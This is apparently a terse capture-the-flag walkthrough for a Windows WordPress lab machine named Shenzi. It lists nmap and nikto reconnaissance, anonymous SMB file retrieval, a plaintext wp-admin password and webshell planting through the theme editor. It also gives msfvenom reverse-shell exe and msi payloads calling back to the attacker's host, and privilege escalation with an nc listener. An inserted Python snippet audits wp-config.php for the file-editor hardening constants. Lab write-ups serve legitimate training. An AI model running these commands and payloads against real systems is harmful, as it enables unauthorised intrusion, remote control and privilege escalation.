nmap -A -p- -oA shenzi 192.168.234.55 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA shenzi 192.168.234.55

nmap -sU -O -p- -oA shenzi-udp 192.168.234.55

nikto -h 192.168.234.55:80

whatweb 192.168.234.55

smbclient //192.168.234.55/Shenzi -N

recurse

prompt off

mget *

cat password.txt

http://192.168.234.55/shenzi/

http://192.168.234.55/shenzi/wp-admin/ admin:FeltHeadwallWight357

We go to Appearance > Theme editor and modify the 404.php file.

https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.234 LPORT=445 -f exe > shenzi_reverse.exe

We upload the file and click execute.
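
On the defensive side, the Theme editor step above depends on the WordPress dashboard file editor being enabled. The following is an added example, not part of the original write-up: it audits a wp-config.php for the DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS constants. The sample configs and function names are constructed for illustration.

```python
import re

# Constants that switch off the wp-admin file editors (DISALLOW_FILE_EDIT) or
# every file modification from the dashboard (DISALLOW_FILE_MODS).
HARDENING = ("DISALLOW_FILE_EDIT", "DISALLOW_FILE_MODS")
DEFINE_RE = re.compile(r"""define\s*\(\s*['"](\w+)['"]\s*,\s*([^)]+?)\s*\)\s*;""", re.I)

def strip_php_comments(src):
    """Drop /* */ blocks and whole-line // or # comments (simplified, no PHP lexer)."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return re.sub(r"(?m)^[ \t]*(//|#).*$", "", src)

def audit_wp_config(src):
    """Return {constant: True/False}; only a literal true or 1 counts as enabled."""
    state = {}
    for name, value in DEFINE_RE.findall(strip_php_comments(src)):
        if name in HARDENING and name not in state:  # PHP keeps the first define()
            state[name] = value.lower() in ("true", "1")
    return {name: state.get(name, False) for name in HARDENING}

def theme_editor_enabled(src):
    """True when neither constant blocks Appearance > Theme editor."""
    return not any(audit_wp_config(src).values())

# Constructed sample configs (not taken from the target in the write-up).
SAMPLE_DEFAULT = """<?php
define( 'DB_NAME', 'wordpress' );
// define( 'DISALLOW_FILE_EDIT', true );
/* define('DISALLOW_FILE_MODS', true); */
require_once ABSPATH . 'wp-settings.php';
"""
SAMPLE_HARDENED = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DISALLOW_FILE_EDIT', true );
require_once ABSPATH . 'wp-settings.php';
"""

if __name__ == "__main__":
    for label, cfg in (("default", SAMPLE_DEFAULT), ("hardened", SAMPLE_HARDENED)):
        print(label, audit_wp_config(cfg), "editor enabled:", theme_editor_enabled(cfg))
```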

After running winPEASany.exe, we can see that msi files can be created for the system.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.234 LPORT=445 -f msi > privesc.msi

privesc.msi

nc -lvnp 445

copyright©2022 Cu3rv0x all rights reserved